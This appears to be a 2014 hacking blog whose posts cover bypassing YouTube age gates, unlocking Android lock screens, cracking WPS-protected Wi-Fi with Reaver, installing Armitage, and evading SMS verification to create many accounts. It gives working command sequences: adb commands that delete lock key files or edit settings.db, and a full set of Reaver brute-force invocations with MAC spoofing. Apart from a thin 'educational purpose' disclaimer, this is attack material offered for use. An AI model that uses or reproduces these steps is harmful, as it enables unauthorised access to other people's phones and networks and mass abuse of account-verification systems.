Amazon

Saturday, May 17, 2014

Bypass Age Restriction On Youtube Videos Without Login

Have you ever wanted to watch a video on YouTube, but couldn't because it was age restricted and you didn't have an account? This Post will teach you how to bypass age restrictions on YouTube.

Bypassing “Age-Restricted” Content Warning Message on YouTube NSFW Videos



Method 1 : The first method for watching adult YouTube videos without signing in/up.
1)  On the video you want to view, get the video code from the URL.
Example: http://www.youtube.com/watch?v=O07u7KdRVo0

O07u7KdRVo0 would be the video code in this case.

2) Now add the video code to the following link:
http://www.youtube.com/v/VIDEO CODE HERE?fs=1&amp
becomes
http://www.youtube.com/v/O07u7KdRVo0?fs=1&

3) Now, go to that link and you will be able to view it without logging in or being over 18 xd.

Method 2 : Going out of YouTube
In this Method You being redirected to a different site, you can instead add "nsfw" in front of YouTube in the URL.

http://www.youtube.com/watch?v=O07u7KdRVo0
...becomes...

http://www.nsfwyoutube.com/watch?v=O07u7KdRVo0
 
This takes you to a site dedicated, as the name suggests, to letting you watch YouTube's NSFW side to your heart's content

Friday, April 18, 2014

5 ways to bypass/crack/unlock android password/face/PIN or pattern lock without flashing

Android is a Linux based operating system designed primarily for touch screen smart phones. It is a Linux based operating system that’s why we don’t doubt on its security, but still there are security flaws exist in android phones, by which an user can take full control on it. Today we are unveiling some of the major android security flaws by which anyone can bypass or crack android password/face/PIN or pattern lock. This article is for those android users who has forgotten their android phone lock and want to reset that without flashing or formatting.
 
crack android password
 
This article will give you a comprehensive review about how weak actually android security is. Moreover, most importantly, this article is for educational purpose only, don’t apply these android tricks on any other people’s android phones without permission. You will be responsible for any errors or misbehaving of your devices.
 
Method 1: This android password resetting method is for those, who have recovery(Cwm,Twrp,Xrec,Etc..) Installed on their android phones.

How to bypass/crack/unlock android password/face/PIN or pattern lock
1. Eject memory card from your phone and connect memory card to your pc.
2. Now download pattern password disable on your sdcard using your pc.
3. Insert the sdcard into your phone.
4. Reboot into recovery mode.
5. Flash the Zip.
6. Reboot.
7. Done.
Note: Incase you will see a gesture pattern grid or password after resetting, don’t worry just enter a random password or pattern and it should unblock.

Method 2: This method is for those, who don’t have recovery installed on their android phones.
How to bypass/crack/unlock android password/face/PIN or pattern lock

Requirements:
1) A computer running linux distribution or windows+Cygwin.
2) USB cable to connect your phone to pc.
3) Adb installed.

How to install Adb on your Linux or windows+Cygwin PC:
Open terminal and type “sudo apt-get install android-tools-adb” without quotes and then press enter.
Once everything is setup, now we will move to real guide on how to bypass or crack android phone lock without recovery installed. Instructions are,

Instructions:
1) Connect your phone (turned on) to computer via USB.
2) Open a terminal window.
3) Type the following commands (don’t forget to press enter after typing every command).
adb devices
adb shell
cd data/system
su
rm *.key
4) Reboot and Done.
Note: Incase you will see a gesture pattern grid or password after resetting, don’t worry just enter a random password and pattern and it should unblock.

Method 3: This method will work for everyone, and we will use Adb-SQL command in it.

How to bypass/crack/unlock android password/face/PIN or pattern lock
This method is very much similar with Method 2, the only difference is the difference in commands. So, I am intentionally using some text snippet part of method 2 in this method.

Requirements:
1) A computer running linux distribution or windows+Cygwin.
2) USB cable to connect your phone to pc.
3) Adb installed.

How to install Adb on your Linux or windows+Cygwin PC:

Open terminal and type “sudo apt-get install android-tools-adb” without quotes and then press enter.
Once everything is setup, now we will move to real guide on how to bypass or crack android phone lock without recovery installed. Instructions are,
Instructions:

1) Connect your phone (turned on) to computer via USB.
2) Open a terminal window.
3) Type the following commands (don’t forget to press enter after typing every command).
adb shell
cd /data/data/com.android.providers.settings/databases
sqlite3 settings.db
update system set value=0 where name=’lock_pattern_autolock’;
update system set value=0 where name=’lockscreen.lockedoutpermanently’;
quit

Method 4: This android password cracking Method is For Everyone via Adb- File Removal:

How to bypass/crack/unlock android password/face/PIN or pattern lock
This method is also very much same as above 2 methods, again the only difference is that of command difference. I recommend you to follow the Method 3, till instruction 3rd and in instruction 4, insert following command at shell and then press enter.
adb shell rm /data/system/gesture.key
your android phone lock would be unlocked after entering the above command, Just restart your android phone and enjoy.

Method 5: This android password cracking method is for everyone, but before lock accident.

How to bypass/crack/unlock android password/face/PIN or pattern lock
There is an android application named “SMS bypass” exist which can be used to bypass android phone screen lock by just sending a SMS. This method will reset password or pattern lock of android after receiving a preset keyword along with a Secret code via SMS.
However, the problem is that this android application requires root access.
1) Download SMS bypass from here.
2) Give application a root access.
3) And finally change the screen code to your preferred choice.
Now, everything done,
Just Send the following message from any another phone.
1234 reset
your phone will restart and android lock will be reset to default password, which is 1234.

Here is the end of article on how to bypass android phone password, PIN or pattern lock. For any queries or suggestions please put your comments in comment box below, I would like to hear from you.

Wednesday, March 19, 2014

Cracking Wifi WPA/WPA2 passwords using Reaver-WPS

Wifi Logo

                              reaver-wps

                                     Brute force attack against Wifi Protected Setup

Overview:

Reaver-wps performs a brute force attack against an access point’s WiFi Protected Setup pin number. Once the WPS pin is found, the WPA PSK can be recovered and alternately the AP’s wireless settings can be reconfigured.
While Reaver-wps does not support reconfiguring the AP, this can be accomplished with wpa_supplicant once the WPS pin is known.

Description:

Reaver-wps targets the external registrar functionality mandated by the WiFi Protected Setup specification. Access points will provide authenticated registrars with their current wireless configuration (including the WPA PSK), and also accept a new configuration from the registrar.
In order to authenticate as a registrar, the registrar must prove its knowledge of the AP’s 8-digit pin number. Registrars may authenticate themselves to an AP at any time without any user interaction. Because the WPS protocol is conducted over EAP, the registrar need only be associated with the AP and does not need any prior knowledge of the wireless encryption or configuration.
Reaver-wps performs a brute force attack against the AP, attempting every possible combination in order to guess the AP’s 8 digit pin number. Since the pin numbers are all numeric, there are 10^8 (100,000,000) possible values for any given pin number. However, because the last digit of the pin is a checksum value which can be calculated based on the previous 7 digits, that key space is reduced to 10^7 (10,000,000) possible values.
The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually. That means that there are 10^4 (10,000) possible values for the first half of the pin and 10^3 (1,000) possible values for the second half of the pin, with the last digit of the pin being a checksum.
Reaver-wps brute forces the first half of the pin and then the second half of the pin, meaning that the entire key space for the WPS pin number can be exhausted in 11,000 attempts. The speed at which Reaver can test pin numbers is entirely limited by the speed at which the AP can process WPS requests. Some APs are fast enough that one pin can be tested every second; others are slower and only allow one pin every ten seconds. Statistically, it will only take half of that time in order to guess the correct pin number.

Installation:

Install Kali Linux, everything built into it. (Reaver-wps, libpcap and libsqlite3)

Usage:

Usually, the only required arguments to Reaver-wps are the interface name and the BSSID of the target AP:
# reaver -i mon0 -b 00:01:02:03:04:05
The channel and SSID (provided that the SSID is not cloaked) of the target AP will be automatically identified by Reaver-wps, unless explicitly specified on the command line:
# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
By default, if the AP switches channels, Reaver-wps will also change its channel accordingly. However, this feature may be disabled by fixing the interface’s channel:
# reaver -i mon0 -b 00:01:02:03:04:05 --fixed
The default receive timeout period is 5 seconds. This timeout period can be set manually if necessary (minimum timeout period is 1 second):
# reaver -i mon0 -b 00:01:02:03:04:05 -t 2
The default delay period between pin attempts is 1 second. This value can be increased or decreased to any non-negative integer value. A value of zero means no delay:
# reaver -i mon0 -b 00:01:02:03:04:05 -d 0
Some APs will temporarily lock their WPS state, typically for five minutes or less, when “suspicious” activity is detected. By default when a locked state is detected, Reaver-wps will check the state every 315 seconds (5 minutes and 15 seconds) and not continue brute forcing pins until the WPS state is unlocked. This check can be increased or decreased to any non-negative integer value:
# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
For additional output, the verbose option may be provided. Providing the verbose option twice will increase verbosity and display each pin number as it is attempted:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
The default timeout period for receiving the M5 and M7 WPS response messages is .1 seconds. This timeout period can be set manually if necessary (max timeout period is 1 second):
# reaver -i mon0 -b 00:01:02:03:04:05 -T .5
Some poor WPS implementations will drop a connection on the floor when an invalid pin is supplied instead of responding with a NACK message as the specs dictate. To account for this, if an M5/M7 timeout is reached, it is treated the same as a NACK by default. However, if it is known that the target AP sends NACKS (most do), this feature can be disabled to ensure better reliability. This option is largely useless as Reaver-wps will auto-detect if an AP properly responds with NACKs or not:
# reaver -i mon0 -b 00:01:02:03:04:05 --nack
While most APs don’t care, sending an EAP FAIL message to close out a WPS session is sometimes necessary. By default this feature is disabled, but can be enabled for those APs that need it:
# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
When 10 consecutive unexpected WPS errors are encountered, a warning message will be displayed. Since this may be a sign that the AP is rate limiting pin attempts or simply being overloaded, a sleep can be put in place that will occur whenever these warning messages appear:
# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360

More on Basic Usages

First, make sure your wireless card is in monitor mode:
# airmon-ng start wlan0
To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually ‘mon0′, not ‘wlan0′, although this will vary based on your wireless card/drivers):
# reaver -i mon0 -b 00:01:02:03:04:05
You will probably also want to use -vv to get verbose info about Reaver’s progress:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv

Speeding Up the Attack

By default, Reaver-wps has a 1 second delay between pin attempts. You can disable this delay by adding ‘-d 0′ on the command line, but some APs may not like it:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
Another option that can speed up an attack is –dh-small. This option instructs Reaver to use small diffie-hellman secret numbers in order to reduce the computational load on the target AP:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small

MAC Spoofing

In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the –mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.
Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card’s physical interface. For example:
# ifconfig wlan0 down
 # ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
 # ifconfig wlan0 up
 # airmon-ng start wlan0
 # reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
Supported Wireless Drivers
The following wireless drivers have been tested or reported to work successfully with Reaver-wps:
 ath9k
 rtl8187
 carl19170
 ipw2000
 rt2800pci
 rt73usb

Partially Supported

The following wireless drivers have had mixed success, and may or may not work depending on your wireless card (i.e., if you are having problems with these drivers/cards, consider trying a new card before submitting a trouble ticket):
 ath5k
 iwlagn
 rtl2800usb (using the latest compat-wireless drivers has
 b43         fixed many user's problems, hint hint...)

Not Supported

The following wireless drivers/cards have been tested or reported to not work properly with Reaver:
 iwl4965
 RT3070L
 Netgear WG111v3
Enjoy.

Monday, January 27, 2014

How To Install Armitage In Kali Linux

As you may know, the highly anticipated Kali Linux is now available. If you’ve fired it up, you may notice it’s missing a familiar tool. Armitage is not present. The Kali Linux team added an Armitage package to its repository today. To get it:

apt-get install armitage

Before you start Armitage, make sure the postgresql database is running:

service postgresql start

If you get a missing database.yml error, type:

service metasploit start

Friday, January 24, 2014

Bypass Phone and SMS verification of Any Website

Now a days, almost most websites need sms verification which includes google, facebook, youtube and other survey websites.

First of all we should understand why SMS and Phone Verification System is Important?

* Keep More Visitors for Market
* Providing Extra Security for their Website
* Keep Spammers out
* Daily Advertisement and promotional ads daily

Rather we can able to create and Bypass gmail (facebook, youtube, other shopping sites) without SMS verification. Because gmail allow to create only few account. When you try to create more account with same mobile number, google restricted and you can't create more account. so we can create counterless gmail accounts using following steps.
This method is very useful to Bypass SMS verification and useful when you need to Sign up any account and do not feel comfortable to giving your real number or if you want to create multiple account.

Lets Start Step by Step:

1) First go to this Website : Receive-Sms Online

2) Copy any one number and paste it where they are asking SMS Verification.

Bypass-Phone-and-SMS-verification-of-Any-Website
3) Simply come back and click the number which you have selected, check it out there is your code sent by google, youtube or whatever else

How To Hack App Lock In Any Android Phone

App Lock is one of the most useful application on Android. Since it came into App Store, it became must and should application in ...